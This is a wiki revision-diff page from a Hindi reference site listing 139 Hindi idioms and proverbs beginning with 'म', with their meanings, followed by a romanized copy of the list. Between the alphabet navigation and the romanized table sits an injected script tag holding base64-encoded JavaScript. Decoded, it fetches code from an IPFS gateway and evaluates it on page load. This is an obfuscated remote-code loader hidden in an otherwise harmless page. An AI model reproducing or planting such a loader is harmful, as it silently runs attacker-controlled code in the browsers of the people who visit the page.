Difference between revisions of "कहावत लोकोक्ति मुहावरे-म"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "खराब" to "ख़राब")
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(18 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
  
{| class="bharattable"
+
{| class="bharattable-pink"
 
|-
 
|-
!कहावत लोकोक्ति मुहावरे
+
! style="width:30%"| कहावत लोकोक्ति मुहावरे
!अर्थ
+
! style="width:70%"| अर्थ
 
|-
 
|-
| style="width:30%"|
+
| 1- मूंछ उखाड़े मुर्दा हल्को न होवे।
1- मूंछ उखाड़े मुर्दा हल्को न होवे।
+
| अर्थ - छोटे-छोटे काम कर लेने से किसी बड़े काम में सफलता प्राप्त नहीं होती। बड़ा काम करने में छोटी-छोटी कोशिशें करने कोई मदद नहीं मिलती है, छोटे काम व्यर्थ ही कहे जाते हैं।
| style="width:70%"|
 
अर्थ - छोटे-छोटे काम कर लेने से किसी बड़े काम में सफलता प्राप्त नहीं होती। बड़ा काम करने में छोटी-छोटी कोशिशें करने कोई मदद नहीं मिलती है, छोटे काम व्यर्थ ही कहे जाते हैं।
 
 
|-
 
|-
|2- मुर्गी अपनी जान से गई, <br />
+
|2- मुर्गी अपनी जान से गई, खाने वाले को स्वाद न आया।
खाने वाले को स्वाद न आया।
+
|अर्थ - इतना भारी काम किया फिर भी सराहना नहीं हुई।  
|
 
अर्थ - इतना भारी काम किया फिर भी सराहना नहीं हुई।  
 
 
|-
 
|-
|3- मान न मान मैं तेरा मेहमान।
+
|3- [[मान न मान मैं तेरा मेहमान]]
|
+
|अर्थ - किसी व्यक्ति का ज़बरदस्ती  का मेहमान होना।  
अर्थ - किसी व्यक्ति का ज़बरदस्ती  का मेहमान होना।  
 
 
|-
 
|-
 
|4- मक्खियाँ मारना।
 
|4- मक्खियाँ मारना।
|
+
|अर्थ - ख़ाली बैठना, कुछ काम ना करना।
अर्थ - ख़ाली बैठना, कुछ काम ना करना।
 
 
|-
 
|-
 
|5- मक्खी नाक पर न बैठने देना।  
 
|5- मक्खी नाक पर न बैठने देना।  
|
+
|अर्थ - इज़्ज़त ख़राब न होने देना।
अर्थ - इज़्ज़त ख़राब न होने देना।
 
 
|-
 
|-
 
|6- मज़ा किरकिरा  होना।
 
|6- मज़ा किरकिरा  होना।
|
+
|अर्थ - आनन्द में विघ्न होना।
अर्थ - आनन्द में विघ्न होना।
 
 
|-
 
|-
 
|7- मन के लड्डू (मनमोदक) खाना।
 
|7- मन के लड्डू (मनमोदक) खाना।
|
+
|अर्थ - कल्पना करके प्रसन्न होना।
अर्थ - कल्पना करके प्रसन्न होना।
 
 
|-
 
|-
 
|8- मन मैला करना।
 
|8- मन मैला करना।
|
+
|अर्थ - खिन्न होना।
अर्थ - खिन्न होना।
 
 
|-
 
|-
 
|9- माथा ठनकना।
 
|9- माथा ठनकना।
|
+
|अर्थ - संशय होना।
अर्थ - संशय होना।
 
 
|-
 
|-
 
|10- मिट्टी का माधो।
 
|10- मिट्टी का माधो।
|
+
|अर्थ - नासमझ आदमी, बुद्धू।
अर्थ - नासमझ आदमी, बुद्धू।
 
 
|-
 
|-
 
|11- मीठी छुरी चलाना।
 
|11- मीठी छुरी चलाना।
|
+
|अर्थ - विश्वासघात करना।
अर्थ - विश्वासघात करना।
 
 
|-
 
|-
 
|12- मुँह उतरना।
 
|12- मुँह उतरना।
|
+
|अर्थ - उदास हो जाना।
अर्थ - उदास हो जाना।
 
 
|-
 
|-
 
|13- मुँह की खाना।
 
|13- मुँह की खाना।
|
+
|अर्थ - बुरी तरह हारना।
अर्थ - बुरी तरह हारना।
 
 
|-
 
|-
 
|14- मुँह धो रखना / आना।
 
|14- मुँह धो रखना / आना।
|
+
|अर्थ - आशा न रखना।
अर्थ - आशा न रखना।
 
 
|-
 
|-
 
|15- मुँह पकड़ना।
 
|15- मुँह पकड़ना।
|
+
|अर्थ - बोलने न देना।
अर्थ - बोलने न देना।
 
 
|-
 
|-
 
|16- मुँह पर बसंत फूलना या खिलना।
 
|16- मुँह पर बसंत फूलना या खिलना।
|
+
|अर्थ - भयभीत होना।
अर्थ - भयभीत होना।
 
 
|-
 
|-
 
|17- मुँह बनाना।
 
|17- मुँह बनाना।
|
+
|अर्थ - खीझ प्रकट करना।
अर्थ - खीझ प्रकट करना।
 
 
|-
 
|-
 
|18- मुँह में पानी भर आना / लार टपकाना।
 
|18- मुँह में पानी भर आना / लार टपकाना।
|
+
|अर्थ - खाने को जी करना।  
अर्थ - खाने को जी करना।  
 
 
|-
 
|-
 
|19- मुट्ठी गरम करना।
 
|19- मुट्ठी गरम करना।
|
+
|अर्थ - घूस देना।
अर्थ - घूस देना।
 
 
|-
 
|-
 
|20- मैदान मारना।
 
|20- मैदान मारना।
|
+
|अर्थ - लड़ाई जीतना।
अर्थ - लड़ाई जीतना।
 
 
|-
 
|-
 
|21- मुट्ठी में करना।
 
|21- मुट्ठी में करना।
|
+
|अर्थ - वश में करना।
अर्थ - वश में करना।
 
 
|-
 
|-
 
|22- मोटा आदमी / असामी।
 
|22- मोटा आदमी / असामी।
|
+
|अर्थ - धनी व्यक्ति।
अर्थ - धनी व्यक्ति।
 
 
|-
 
|-
 
|23- मोहर लगा देना।
 
|23- मोहर लगा देना।
|
+
|अर्थ - पुष्टि करना।
अर्थ - पुष्टि करना।
 
 
|-
 
|-
 
|24- म्याऊँ का ठौर पकड़ना।
 
|24- म्याऊँ का ठौर पकड़ना।
|
+
|अर्थ - खतरे में पड़ना।
अर्थ - खतरे में पड़ना।
 
 
|-
 
|-
 +
|25- [[मन चंगा तो कठौती में गंगा]]
 +
|अर्थ - मन जो काम करने के लिए अन्त:करण से तैयार हो वही काम करना उचित है।
 +
|-
 +
|26- [[मज़ा आना|मज़ा आना/आ जाना]]।
 +
|अर्थ - तबीयत ख़ूब प्रसन्न होना।
 +
|-
 +
|27- [[मज़ा चखाना]]।
 +
|अर्थ - बदला लेना या इस बात का ज्ञान करा देना कि कष्ट कैसे  भोगा जाता है।
 +
|-
 +
|28- [[मज़ा पड़ना]]।
 +
|अर्थ - किसी एसी बात या काम का चस्का पड‌ना जिससे सुख मिलता हो।
 +
|-
 +
|29- मज़ाक उड़ाना।
 +
|अर्थ - उपहास करना।
 +
|-
 +
|30- [[मज़ा लूटना|मज़ा/मज़े लूटना]]।
 +
|अर्थ - ख़ूब मौज करना।
 +
|-
 +
|31-[[मज़ाक समझना]]।
 +
|अर्थ - साधारण हँसी की बात अर्थात् उपेक्ष्य बात समझना।
 +
|-
 +
|32- [[मज़े से]]।
 +
|अर्थ - आसानी से, सरलता से या अच्छी तरह।
 +
|-
 +
|33- [[मटियामेट करना|मटियामेट करना/कर देना]]।
 +
|अर्थ - नष्ट कर देना, न रहने देना।
 +
|-
 +
|34- [[मंत्र फूँकना|मंत्र फूँकना/फूँक देना]]।
 +
|अर्थ - चमत्कार कर देना।
 +
|-
 +
|35- [[मक्खन लगाना]]।
 +
|अर्थ - ख़ुशामद करना।
 +
|-
 +
|36- [[मक्खी मारना|मक्खी/मक्खियाँ मारना]]।
 +
|अर्थ - फ़ालतू बैठे या बेकार के काम करते रहना।
 +
|-
 +
|37- [[मखौल लगना]]।
 +
|अर्थ - हास्यास्पद प्रतीत होना।
 +
|-
 +
|38- मगज़ ख़ाली करना/कर देना।
 +
|अर्थ - बहुत बक-बक करके या दिमागी काम करके किसी का मस्तिष्क थकाना।
 +
|-
 +
|39- मगज़ खौलना।
 +
|अर्थ - क्रोध के कारण दिमाग या मस्तिष्क खराब होना।
 +
|-
 +
|40- मगज़ चल जाना।
 +
|अर्थ - दिमाग खराब हो जाना, पागल हो जाना।
 +
|-
 +
|41- [[मचल उठना]]।
 +
|अर्थ - जिद करना।
 +
|-
 +
|42- [[मचलने लगना]]।
 +
|अर्थ - हठपूर्वक छटपटाने लगना।
 +
|-
 +
|43- मँझधार में फँसना।
 +
|अर्थ - गहरे संकट में पड़ जाना।
 +
|-
 +
|44- [[मक्खी की तहर निकाल देना|मक्खी की तहर निकाल देना/निकाल फेंकना]]।
 +
|अर्थ - उपेक्षापूर्वक किसी को किसी काम से बिल्कुल अलग कर देना।
 +
|-
 +
|45- [[मतलब निकालना|मतलब निकालना/गाँठना]]।
 +
|अर्थ - स्वार्थ सिद्ध करना।
 +
|-
 +
|46- [[मति मारी जाना]]।
 +
|अर्थ - बुद्धि का ठीक तरह से काम न करना।
 +
|-
 +
|47- [[मत्थे पड़ना]]।
 +
|अर्थ -अप्रत्याशित उत्तरदायित्व उठाना।
 +
|-
 +
|48- [[मत्थे मढ़ना]]।
 +
|अर्थ -ज़िम्मे लगाना, आरोपित करना।
 +
|-
 +
|49- मन अटकना।
 +
|अर्थ - प्रेम-पात्र की ओर पूरी तरह से ध्यान खिंचना।
 +
|-
 +
|50- [[मन अनमना होना]]।
 +
|अर्थ - उदासी के कारण मन का किसी ओर या किसी में न लगना।
 +
|-
 +
|51- मन आना।
 +
|अर्थ - इच्छा या तबीयत होना।
 +
|-
 +
|52- [[मन उचट जाना]]।
 +
|अर्थ - ऊब या विरक्ति हो जाना।
 +
|-
 +
|53- [[मन कचोटना|मन कचोटना/कचोट जाना]]।
 +
|अर्थ - कष्ट, पश्चात्ताप, वियोग आदि के कारण मन में क्लेश या दु:ख होना।
 +
|-
 +
|54- [[मन कड़ा करना]]।
 +
|अर्थ - हिम्मत करना।
 +
|-
 +
|55- [[मन कर आना]]।
 +
|अर्थ - इच्छा जाग्रत होना।
 +
|-
 +
|56- [[मर करना]]।
 +
|अर्थ - इच्छा या प्रवृत्ति होना, जी चाहना।
 +
|-
 +
|57- [[मन कसना]]।
 +
|अर्थ - निश्चय करना।
 +
|-
 +
|58- [[मन का मैला]]।
 +
|अर्थ - मन में दुर्भाव रखने वाला।
 +
|-
 +
|59- [[मन की करना]]।
 +
|अर्थ - जो चाहना सो करना।
 +
|-
 +
|60- मन का राजा।
 +
|अर्थ - स्वच्छंद विचरण करने वाला व्यक्ति।
 +
|-
 +
|61- [[मन की होना]]।
 +
|अर्थ - वही बात होना जिसे मन चाह रहा हो।
 +
|-
 +
|62- मन की मन मे रह जाना।
 +
|अर्थ - साध पूरी न होना।
 +
|-
 +
|63- [[मन को छूना]]।
 +
|अर्थ - मन में सहानुभूति कृतज्ञता आदि का भाव जगाना।
 +
|-
 +
|64- [[मन खटटा हो जाना]]।
 +
|अर्थ - किसी के प्रति मन में द्वेषभाव या घृणा उत्पन्न होना।
 +
|-
 +
|65- मन के लड्डू खाना।
 +
|अर्थ - ऐसी बात सोचकर प्रसन्न होना जिसका पूरा होना असंभव हो, झूठी आशा पर प्रसन्न होना।
 +
|-
 +
|66- [[मन खटटा मीठा होना]]।
 +
| अर्थ - मन में किसी के प्रति आकर्षण-विकर्षण एक साथ होना।
 +
|-
 +
|67- [[मन खिल उठना]]।
 +
|अर्थ - तबीयत ख़ुश हो जाना, मन उत्फुल्ल  होना।
 +
|-
 +
|68- मन ख़राब करना।
 +
|अर्थ - मन में किसी प्रकार दुर्भाव लाना।
 +
|-
 +
|69- [[मन खोया खोया रहना]]।
 +
|अर्थ - मन उदास तथा उद्विग्न रहना।
 +
|-
 +
|70- [[मन जमना]]।
 +
|अर्थ - मन का पूर्णतः आश्वस्त होना।
 +
|-
 +
|71- [[मन जीतना]]।
 +
|अर्थ - इच्छाओं पर विजय पाना।
 +
|-
 +
|72- [[मन टटोलना]]।
 +
|अर्थ - बातों ही बातों में किसी के भावों, विचारों आदि से परिचित होने का प्रयत्न करना।
 +
|-
 +
|73- [[मन टूटना]]।
 +
|अर्थ - उत्साह, उमंग, साहस आदि का नाश या ह्रास होना।
 +
|-
 +
|74- [[मन ठिकाने न होना]]।
 +
|अर्थ - चित्त स्थित या शांत न होना।
 +
|-
 +
|75- [[मन डूबना]]।
 +
|अर्थ - मानसिक शक्तियों का ह्रास होना।
 +
|-
 +
|76- [[मन डोलना]]।
 +
|अर्थ - मन का विचलित होना।
 +
|-
 +
|77- [[मन तरसना]]।
 +
|अर्थ - प्राप्ति के लिए मन में प्रबल इच्छा होना।
 +
|-
 +
|78- [[मन तोड़ना]]।
 +
|अर्थ - दूसरे की इच्छा को कुचल देना अथवा उसके मन की बात न करके उसे हतोत्साहित करना।
 +
|-
 +
|79- मन तौलना।
 +
|अर्थ - यह जानने का प्रयत्न करना कि कोई किसी बात पर कहाँ तक स्थिर रह सकता है।
 +
|-
 +
|80- [[मन न भरना]]।
 +
|अर्थ - पूर्ण संतुष्टि या तृप्ति न होना।
 +
|-
 +
|81- [[मन नाच उठना]]।
 +
|अर्थ - अत्यंत प्रसन्नता होना।
 +
|-
 +
|82- [[मन पक्का करना]]।
 +
|अर्थ - निश्चय करना।
 +
|-
 +
|83- [[मन फट जाना]]।
 +
|अर्थ - मन में किसी के प्रति सभ्दाव न रह जाना।
 +
|-
 +
|84- [[मन फिर जाना]]।
 +
|अर्थ - विमुख होना।
 +
|-
 +
|85- [[मन फिसलना|मन फिसलना/फिसल जाना]]।
 +
| अर्थ - मन का किसी पर मुग्ध हो जाना।
 +
|-
 +
|86- [[मन फेरना|मन फेरना/फेर लेना]]।
 +
| अर्थ - ध्यान से हटा या उतार देना, प्रवृत्ति दूसरी ओर करना।
 +
|-
 +
|87- [[मन बँटना]]।
 +
| अर्थ - ध्यान बँटना।
 +
|-
 +
|88- [[मन बढ़ना]]।
 +
| अर्थ - उत्साह बढ़़ना।
 +
|-
 +
|89- मन बढ़ाना।
 +
| अर्थ - उत्साहित करना।
 +
|-
 +
|90- [[मन बदल जाना]]।
 +
| अर्थ - विचार परिवर्तन हो जाना।
 +
|-
 +
|91- [[मन बहलाना]]।
 +
| अर्थ - ऐसा काम करना जिससे मनोरंजन हो।
 +
|-
 +
|92- [[मन बाँध लेना]]।
 +
| अर्थ - पुरी तरह से आकृष्ट तथा मुग्ध कर लेना।
 +
|-
 +
|93- [[मन बोलना]]।
 +
| अर्थ - अंदर से अंतरात्मा की आवाज़ आना।
 +
|-
 +
|94-[[मन भटकना]]।
 +
| अर्थ -मन का किसी निश्चय पर न पहुँचकर तरह-तरह की बातें सोचते रहना।
 +
|-
 +
|95- [[मन भर जाना]]।
 +
| अर्थ - अनुराग या प्रवृत्ति न रह जाना।
 +
|-
 +
|96- [[मन भारी होना]]।
 +
| अर्थ - मन में किसी प्रकार की अस्वस्थता का अनुभव या बोध होना।
 +
|-
 +
|97- [[मन मानना]]।
 +
|अर्थ - मन को प्रिय प्रतीत हेाना।
 +
|-
 +
|98- [[मन मारना]]।
 +
|अर्थ - जेब मे पैसा न होने से ये भी मन मार कर बैठ गए हैं।
 +
|-
 +
|99- मन मिलना।
 +
|अर्थ - प्रकृति, प्रवृत्ति, रुचि, विचार आदि की समानता के कारण किसी से आत्मीयता का संबंध होना।
 +
|-
 +
|100- [[मन में आना]]।
 +
|अर्थ - किसी काम या बात के लिए मन में कोई भाव या विचार उत्पन्न होना।
 +
|-
 +
|101- [[मन में घर करना]]।
 +
|अर्थ - मन में स्थान बना लेना, किसी का आदर-भाव या प्रेम -भाव प्राप्त करना।
 +
|-
 +
|102- [[मन में न जमना]]।
 +
|अर्थ - उपयुक्त या युक्तिसंगत न प्रतीत होना।
 +
|-
 +
|103- [[मन में पानी भर आना]]।
 +
|अर्थ - किसी को प्राप्त कर लेने की मन में तीव्र इच्छा होना।
 +
|-
 +
|104- [[मन में बात उठना]]।
 +
|अर्थ - विचार उत्पन्न होना।
 +
|-
 +
|105- [[मन में बैठना]]।
 +
|अर्थ - मन में जम जाना, मन में घर कर लेना।
 +
|-
 +
|106- [[मन में बैठाना|मन में बैठाना/बैठा देना]]।
 +
|अर्थ - अच्छी तरह समझा देना और उसे उसका अनुयायी बना देना।
 +
|-
 +
|107- [[मन मोम हो जाना]]।
 +
|अर्थ - हृदय द्रवित हो जाना।
 +
|-
 +
|108- [[मन मोह लेना]]।
 +
|अर्थ - पूर्णतः आसक्त या मुग्ध कर लेना।
 +
|-
 +
|109- [[मन रखना]]।
 +
|अर्थ - प्रसन्न रखने के लिए उसकी इच्छा के अनुसार काम करना।
 +
|-
 +
|110- मन मैला करना।
 +
|अर्थ - किसी की ओर से अपने मन में दुर्भाव, द्वेष या वैर-विरोध रखना।
 +
|-
 +
|111- [[मन रखने को]]।
 +
|अर्थ - दिखाने को, ऊपरी मद से।
 +
|-
 +
|112- मन में रखना।
 +
|अर्थ - मन में अच्छी तरह छिपाकर रखना; किसी पर प्रकट न होने देना।
 +
|-
 +
|113- [[मन लगना]]।
 +
|अर्थ - जी लगना।
 +
|-
 +
|114- [[मन में लाना]]।
 +
|अर्थ - विचार करन; सोचना, कोई काम करने का विचार या संकल्प करना।
 +
|-
 +
|115- मन में समाना।
 +
|अर्थ - किसी व्यक्ति, चीज़ या बात का मन में अपनी जगह बना लेना, मन में घर कर लेना।
 +
|-
 +
|116- [[मन लगाकर]]।
 +
|अर्थ - दत्तवित होकर, अत्यंत सावधानी से।
 +
|-
 +
|117- [[मन लहराना]]।
 +
|अर्थ - हृदय में अत्यधिक हर्ष होना।
 +
|-
 +
|118- [[मन लेना]]।
 +
|अर्थ - किसी के मन की बात की थाह या पता लेना।
 +
|-
 +
|119- [[मन से उतरना|मन से उतरना/उतर जाना]]।
 +
|अर्थ - विस्मृत हो जाना, भाव न रह जाना।
 +
|-
 +
|120- [[मन हटना]]।
 +
|अर्थ - विरक्ति होना।
 +
|-
 +
|121- मन्नत उतारना।
 +
|अर्थ - संकल्पित पूजा की प्रतिज्ञा पूरी करना।
 +
|-
 +
|122- [[मन हरण करना|मन हरण करना/कर लेना]]।
 +
|अर्थ - मुग्ध कर लेना, अपना बना लेना।
 +
|-
 +
|123- [[मन हरा होना|मन हरा होना/हो जाना]]।
 +
|अर्थ - मन का प्रसन्न तथा प्रफुल्लित हो जाना।
 +
|-
 +
|124- मन का ढलकना।
 +
|अर्थ - गरदन टेढ़ी होना।
 +
|-
 +
|125- [[मन हलका होना]]।
 +
|अर्थ - मन पर पड़ा हुआ बोझ उतरना।
 +
|-
 +
|126- [[मन होना|मन होना/हो आना]]।
 +
|अर्थ - इच्छा होना।
 +
|-
 +
|127- मन लाना।
 +
|अर्थ - जो लगाना, धारणा बनाना।
 +
|-
 +
|128- मरकर बचना।
 +
|अर्थ - मरने से किसी प्रकार बच जाना।
 +
|-
 +
|129- [[मरकर भी]]।
 +
|अर्थ - सब तरह के प्रयत्न करके भी।
 +
|-
 +
|130- [[मर मिटना]]।
 +
|अर्थ - सब-कुछ गँवाना तथा जान तक दे देना।
 +
|-
 +
|131-मरते को मारना।
 +
|दुखी व्यक्ति को और अधिक सताना।
 +
|-
 +
|132- [[मरते दम तक]]।
 +
|अर्थ - अन्तिम साँस लेने तक।
 +
|-
 +
|133- [[मरना]]।
 +
|अर्थ - अत्यधिक प्यार करना।
 +
|-
 +
|134-[[मरना पड़ना]]।
 +
|अर्थ - घोर कष्ट सहना।
 +
|-
 +
|135-[[मरम्मत करना]]।
 +
|अर्थ - मारना-पीटना।
 +
|-
 +
|136- [[मर्ज होना]]।
 +
|आदत होना।
 +
|-
 +
|137- [[मर्द का काम]]।
 +
|अर्थ - साहस का काम।
 +
|-
 +
|138- [[मन साफ़ होना]]।
 +
|अर्थ - मन में किसी प्रकार का दुर्भाव न होना।
 +
|-
 +
|139- [[मर्दानगी दिखाना]]।
 +
|अर्थ - वीरता दिखाना।
 
|}
 
|}
  
Line 109: Line 427:
  
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 +
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:14, 20 April 2018

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kahavat lokokti muhavare arth
1- mooanchh ukha de murda halko n hove. arth - chhote-chhote kam kar lene se kisi b de kam mean saphalata prapt nahian hoti. b da kam karane mean chhoti-chhoti koshishean karane koee madad nahian milati hai, chhote kam vyarth hi kahe jate haian.
2- murgi apani jan se gee, khane vale ko svad n aya. arth - itana bhari kam kiya phir bhi sarahana nahian huee.
3- man n man maian tera mehaman arth - kisi vyakti ka zabaradasti ka mehaman hona.
4- makkhiyaan marana. arth - khali baithana, kuchh kam na karana.
5- makkhi nak par n baithane dena. arth - izzat kharab n hone dena.
6- maza kirakira hona. arth - anand mean vighn hona.
7- man ke laddoo (manamodak) khana. arth - kalpana karake prasann hona.
8- man maila karana. arth - khinn hona.
9- matha thanakana. arth - sanshay hona.
10- mitti ka madho. arth - nasamajh adami, buddhoo.
11- mithi chhuri chalana. arth - vishvasaghat karana.
12- muanh utarana. arth - udas ho jana.
13- muanh ki khana. arth - buri tarah harana.
14- muanh dho rakhana / ana. arth - asha n rakhana.
15- muanh pak dana. arth - bolane n dena.
16- muanh par basant phoolana ya khilana. arth - bhayabhit hona.
17- muanh banana. arth - khijh prakat karana.
18- muanh mean pani bhar ana / lar tapakana. arth - khane ko ji karana.
19- mutthi garam karana. arth - ghoos dena.
20- maidan marana. arth - l daee jitana.
21- mutthi mean karana. arth - vash mean karana.
22- mota adami / asami. arth - dhani vyakti.
23- mohar laga dena. arth - pushti karana.
24- myaooan ka thaur pak dana. arth - khatare mean p dana.
25- man changa to kathauti mean ganga arth - man jo kam karane ke lie ant:karan se taiyar ho vahi kam karana uchit hai.
26- maza ana/a jana. arth - tabiyat khoob prasann hona.
27- maza chakhana. arth - badala lena ya is bat ka jnan kara dena ki kasht kaise bhoga jata hai.
28- maza p dana. arth - kisi esi bat ya kam ka chaska pad‌na jisase sukh milata ho.
29- mazak u dana. arth - upahas karana.
30- maza/maze lootana. arth - khoob mauj karana.
31-mazak samajhana. arth - sadharan hansi ki bat arthath upekshy bat samajhana.
32- maze se. arth - asani se, saralata se ya achchhi tarah.
33- matiyamet karana/kar dena. arth - nasht kar dena, n rahane dena.
34- mantr phooankana/phooank dena. arth - chamatkar kar dena.
35- makkhan lagana. arth - khushamad karana.
36- makkhi/makkhiyaan marana. arth - falatoo baithe ya bekar ke kam karate rahana.
37- makhaul lagana. arth - hasyaspad pratit hona.
38- magaz khali karana/kar dena. arth - bahut bak-bak karake ya dimagi kam karake kisi ka mastishk thakana.
39- magaz khaulana. arth - krodh ke karan dimag ya mastishk kharab hona.
40- magaz chal jana. arth - dimag kharab ho jana, pagal ho jana.
41- machal uthana. arth - jid karana.
42- machalane lagana. arth - hathapoorvak chhatapatane lagana.
43- manjhadhar mean phansana. arth - gahare sankat mean p d jana.
44- makkhi ki tahar nikal dena/nikal pheankana. arth - upekshapoorvak kisi ko kisi kam se bilkul alag kar dena.
45- matalab nikalana/gaanthana. arth - svarth siddh karana.
46- mati mari jana. arth - buddhi ka thik tarah se kam n karana.
47- matthe p dana. arth -apratyashit uttaradayitv uthana.
48- matthe madhana. arth -zimme lagana, aropit karana.
49- man atakana. arth - prem-patr ki or poori tarah se dhyan khianchana.
50- man anamana hona. arth - udasi ke karan man ka kisi or ya kisi mean n lagana.
51- man ana. arth - ichchha ya tabiyat hona.
52- man uchat jana. arth - oob ya virakti ho jana.
53- man kachotana/kachot jana. arth - kasht, pashchattap, viyog adi ke karan man mean klesh ya du:kh hona.
54- man k da karana. arth - himmat karana.
55- man kar ana. arth - ichchha jagrat hona.
56- mar karana. arth - ichchha ya pravritti hona, ji chahana.
57- man kasana. arth - nishchay karana.
58- man ka maila. arth - man mean durbhav rakhane vala.
59- man ki karana. arth - jo chahana so karana.
60- man ka raja. arth - svachchhand vicharan karane vala vyakti.
61- man ki hona. arth - vahi bat hona jise man chah raha ho.
62- man ki man me rah jana. arth - sadh poori n hona.
63- man ko chhoona. arth - man mean sahanubhooti kritajnata adi ka bhav jagana.
64- man khatata ho jana. arth - kisi ke prati man mean dveshabhav ya ghrina utpann hona.
65- man ke laddoo khana. arth - aisi bat sochakar prasann hona jisaka poora hona asanbhav ho, jhoothi asha par prasann hona.
66- man khatata mitha hona. arth - man mean kisi ke prati akarshan-vikarshan ek sath hona.
67- man khil uthana. arth - tabiyat khush ho jana, man utphull hona.
68- man kharab karana. arth - man mean kisi prakar durbhav lana.
69- man khoya khoya rahana. arth - man udas tatha udvign rahana.
70- man jamana. arth - man ka poornatah ashvast hona.
71- man jitana. arth - ichchhaoan par vijay pana.
72- man tatolana. arth - batoan hi batoan mean kisi ke bhavoan, vicharoan adi se parichit hone ka prayatn karana.
73- man tootana. arth - utsah, umang, sahas adi ka nash ya hras hona.
74- man thikane n hona. arth - chitt sthit ya shaant n hona.
75- man doobana. arth - manasik shaktiyoan ka hras hona.
76- man dolana. arth - man ka vichalit hona.
77- man tarasana. arth - prapti ke lie man mean prabal ichchha hona.
78- man to dana. arth - doosare ki ichchha ko kuchal dena athava usake man ki bat n karake use hatotsahit karana.
79- man taulana. arth - yah janane ka prayatn karana ki koee kisi bat par kahaan tak sthir rah sakata hai.
80- man n bharana. arth - poorn santushti ya tripti n hona.
81- man nach uthana. arth - atyant prasannata hona.
82- man pakka karana. arth - nishchay karana.
83- man phat jana. arth - man mean kisi ke prati sabhdav n rah jana.
84- man phir jana. arth - vimukh hona.
85- man phisalana/phisal jana. arth - man ka kisi par mugdh ho jana.
86- man pherana/pher lena. arth - dhyan se hata ya utar dena, pravritti doosari or karana.
87- man bantana. arth - dhyan bantana.
88- man badhana. arth - utsah badh़na.
89- man badhana. arth - utsahit karana.
90- man badal jana. arth - vichar parivartan ho jana.
91- man bahalana. arth - aisa kam karana jisase manoranjan ho.
92- man baandh lena. arth - puri tarah se akrisht tatha mugdh kar lena.
93- man bolana. arth - aandar se aantaratma ki avaz ana.
94-man bhatakana. arth -man ka kisi nishchay par n pahuanchakar tarah-tarah ki batean sochate rahana.
95- man bhar jana. arth - anurag ya pravritti n rah jana.
96- man bhari hona. arth - man mean kisi prakar ki asvasthata ka anubhav ya bodh hona.
97- man manana. arth - man ko priy pratit heana.
98- man marana. arth - jeb me paisa n hone se ye bhi man mar kar baith ge haian.
99- man milana. arth - prakriti, pravritti, ruchi, vichar adi ki samanata ke karan kisi se atmiyata ka sanbandh hona.
100- man mean ana. arth - kisi kam ya bat ke lie man mean koee bhav ya vichar utpann hona.
101- man mean ghar karana. arth - man mean sthan bana lena, kisi ka adar-bhav ya prem -bhav prapt karana.
102- man mean n jamana. arth - upayukt ya yuktisangat n pratit hona.
103- man mean pani bhar ana. arth - kisi ko prapt kar lene ki man mean tivr ichchha hona.
104- man mean bat uthana. arth - vichar utpann hona.
105- man mean baithana. arth - man mean jam jana, man mean ghar kar lena.
106- man mean baithana/baitha dena. arth - achchhi tarah samajha dena aur use usaka anuyayi bana dena.
107- man mom ho jana. arth - hriday dravit ho jana.
108- man moh lena. arth - poornatah asakt ya mugdh kar lena.
109- man rakhana. arth - prasann rakhane ke lie usaki ichchha ke anusar kam karana.
110- man maila karana. arth - kisi ki or se apane man mean durbhav, dvesh ya vair-virodh rakhana.
111- man rakhane ko. arth - dikhane ko, oopari mad se.
112- man mean rakhana. arth - man mean achchhi tarah chhipakar rakhana; kisi par prakat n hone dena.
113- man lagana. arth - ji lagana.
114- man mean lana. arth - vichar karan; sochana, koee kam karane ka vichar ya sankalp karana.
115- man mean samana. arth - kisi vyakti, chiz ya bat ka man mean apani jagah bana lena, man mean ghar kar lena.
116- man lagakar. arth - dattavit hokar, atyant savadhani se.
117- man laharana. arth - hriday mean atyadhik harsh hona.
118- man lena. arth - kisi ke man ki bat ki thah ya pata lena.
119- man se utarana/utar jana. arth - vismrit ho jana, bhav n rah jana.
120- man hatana. arth - virakti hona.
121- mannat utarana. arth - sankalpit pooja ki pratijna poori karana.
122- man haran karana/kar lena. arth - mugdh kar lena, apana bana lena.
123- man hara hona/ho jana. arth - man ka prasann tatha praphullit ho jana.
124- man ka dhalakana. arth - garadan tedhi hona.
125- man halaka hona. arth - man par p da hua bojh utarana.
126- man hona/ho ana. arth - ichchha hona.
127- man lana. arth - jo lagana, dharana banana.
128- marakar bachana. arth - marane se kisi prakar bach jana.
129- marakar bhi. arth - sab tarah ke prayatn karake bhi.
130- mar mitana. arth - sab-kuchh ganvana tatha jan tak de dena.
131-marate ko marana. dukhi vyakti ko aur adhik satana.
132- marate dam tak. arth - antim saans lene tak.
133- marana. arth - atyadhik pyar karana.
134-marana p dana. arth - ghor kasht sahana.
135-marammat karana. arth - marana-pitana.
136- marj hona. adat hona.
137- mard ka kam. arth - sahas ka kam.
138- man saf hona. arth - man mean kisi prakar ka durbhav n hona.
139- mardanagi dikhana. arth - virata dikhana.